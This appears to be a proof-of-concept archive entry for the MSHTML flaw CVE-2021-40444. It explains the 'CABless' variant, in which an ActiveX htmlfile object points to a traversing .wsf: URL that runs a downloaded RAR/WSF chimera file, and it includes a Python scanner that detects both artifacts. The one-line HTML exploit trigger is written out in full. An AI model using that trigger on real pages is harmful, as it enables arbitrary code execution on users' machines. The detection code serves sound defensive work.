Related vulnerability
Title: Microsoft MSHTML.DLL path traversal vulnerability (CVE-2021-40444)
Description: Microsoft MSHTML.DLL is a dynamic link library from Microsoft (USA) used to parse HTML; applications such as IE, Outlook and Outlook Express use it. Microsoft MSHTML.DLL has a path traversal vulnerability: a remote attacker can craft a specially crafted Office document containing a malicious ActiveX control, lure the victim into opening it, and execute arbitrary code on the system. (Microsoft's own advisory for CVE-2021-40444 classifies it as a remote code execution vulnerability in MSHTML; "path traversal" is the classification used by the Chinese vulnerability database this entry is taken from.)
Description
Modified code so that we don't need to rely on CAB archives
Introduction
# CVE-2021-40444--CABless version
Update: Modified code so that we don't need to rely on CAB archives
The file "index.html" that triggers payload execution contains only one line of code, inside a 'script' tag:

```html
<script>new ActiveXObject('htmlfile').Script.location='.wsf:../../../Downloads/cabless.rar?.wsf';</script>
```

This is the 'Ext2Prot' (extension-to-protocol) behaviour the article is named after: ".wsf" is not a registered URL scheme, so the URL is dispatched to the handler registered for the .wsf file extension (Windows Script Host), and the "../" components resolve to the previously downloaded file in the user's Downloads folder, which WSH then parses as a Windows Script File. No CAB extraction step is needed.
An article in PDF format is provided.
Update: link to video demo -> https://www.youtube.com/watch?v=V9XD3VboEcU
Note: The sample RAR file does NOT contain a Word document designed to exploit the vulnerability, as I took one of the PoCs posted on GitHub as reference. Instead, it just has merged WSF and RAR data to demonstrate the path described in the article, so the file can be parsed as RAR and as WSF (chimera).
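A detection-side check for the two artifacts described above, added here as an example and not part of the original repository: a scanner that flags a downloaded file as a RAR/WSF "chimera" (a WSF job wrapper with a RAR marker block somewhere in the same bytes) and flags an HTML page that sets an `htmlfile` ActiveX object's location to a traversing `.wsf:` pseudo-URL. The sample chimera and HTML below are constructed for the example; they are not the repository's Sample.rar or index.html, and the assumption that the real sample is laid out as WSF text followed by RAR data is only an assumption. The RAR marker is searched at any offset because WinRAR tolerates leading data (that is how SFX archives work).

```python
import re

# RAR marker blocks. WinRAR locates the marker anywhere in the file (that is how
# SFX archives with a leading EXE stub work), so leading WSF text does not stop
# the file from opening as an archive.
RAR4_MAGIC = b"Rar!\x1a\x07\x00"
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"

# Windows Script File structure: an XML <job> element wrapping <script language=...>.
WSF_JOB_RE = re.compile(rb"<\s*job\b", re.IGNORECASE)
WSF_SCRIPT_RE = re.compile(rb"<\s*script\b[^>]*\blanguage\s*=", re.IGNORECASE)

# The README's one-line trigger: an ActiveXObject('htmlfile') whose Script.location
# is a ".wsf:" pseudo-URL that climbs out of the current directory with "../".
TRIGGER_RE = re.compile(
    r"ActiveXObject\(\s*['\"]htmlfile['\"]\s*\)[\s\S]{0,200}?"
    r"location\s*=\s*['\"]\.wsf:(?:\.\./)+",
    re.IGNORECASE,
)
WSF_URL_RE = re.compile(r"['\"](\.wsf:[^'\"]*)['\"]", re.IGNORECASE)


def rar_signature_offsets(data: bytes) -> list:
    """Offsets of every RAR4/RAR5 marker block in data, searched at any position."""
    offsets = set()
    for magic in (RAR4_MAGIC, RAR5_MAGIC):
        idx = data.find(magic)
        while idx != -1:
            offsets.add(idx)
            idx = data.find(magic, idx + 1)
    return sorted(offsets)


def looks_like_wsf(data: bytes) -> bool:
    """True if the bytes carry a WSF <job> with at least one language-tagged <script>."""
    return bool(WSF_JOB_RE.search(data)) and bool(WSF_SCRIPT_RE.search(data))


def is_rar_wsf_chimera(data: bytes) -> bool:
    """A file WinRAR would open as an archive and WSH would run as a script."""
    return looks_like_wsf(data) and bool(rar_signature_offsets(data))


def extract_wsf_urls(html: str) -> list:
    """All quoted '.wsf:' pseudo-URLs in the page, e.g. '.wsf:../../../Downloads/x.rar?.wsf'."""
    return WSF_URL_RE.findall(html)


def has_wsf_trigger(html: str) -> bool:
    """True if the page wires an htmlfile ActiveX object's location to a traversing .wsf: URL."""
    return TRIGGER_RE.search(html) is not None


# Constructed samples for this example (not the repository's Sample.rar or index.html).
WSF_PART = (
    b'<job id="demo">\n'
    b'<script language="JScript">\n'
    b'WScript.Echo("constructed sample");\n'
    b"</script>\n"
    b"</job>\n"
)
# Assumed chimera layout: WSF text followed by a RAR4 marker and filler bytes.
# Enough to exercise both detectors; not a valid archive body.
CONSTRUCTED_CHIMERA = WSF_PART + RAR4_MAGIC + b"\x00" * 16
CONSTRUCTED_INDEX_HTML = (
    "<html><body><script>new ActiveXObject('htmlfile').Script.location="
    "'.wsf:../../../Downloads/cabless.rar?.wsf';</script></body></html>"
)
BENIGN_HTML = "<html><body><script>window.location='next.html';</script></body></html>"


def scan(data: bytes, html: str) -> dict:
    """Summarise both checks for a downloaded file and the page that fetched it."""
    return {
        "rar_offsets": rar_signature_offsets(data),
        "wsf": looks_like_wsf(data),
        "chimera": is_rar_wsf_chimera(data),
        "trigger": has_wsf_trigger(html),
        "wsf_urls": extract_wsf_urls(html),
    }


if __name__ == "__main__":
    print(scan(CONSTRUCTED_CHIMERA, CONSTRUCTED_INDEX_HTML))
```

The file-side check is deliberately format-agnostic: it does not try to validate the RAR headers or the WSF XML, only to notice that one blob satisfies both parsers' entry conditions, which is the property the chimera relies on. The page-side check keys on the scheme-as-extension pattern rather than on the exact file name, so a renamed payload is still caught.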
File snapshot
[4.0K] /data/pocs/69844be2651bbe46b4540da5bbf57bb82a62e9fb
├── [311K] MS_Windows_CVE-2021-40444 - 'Ext2Prot' Vulnerability 'CABless' version.pdf
├── [ 740] README.md
└── [ 199] Sample.rar
0 directories, 3 files
Notes
1. It is recommended to access the PoC through the original source first.
2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com (replace # with @) to request a local snapshot.
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying/donating for the local POC. Thank you for your support.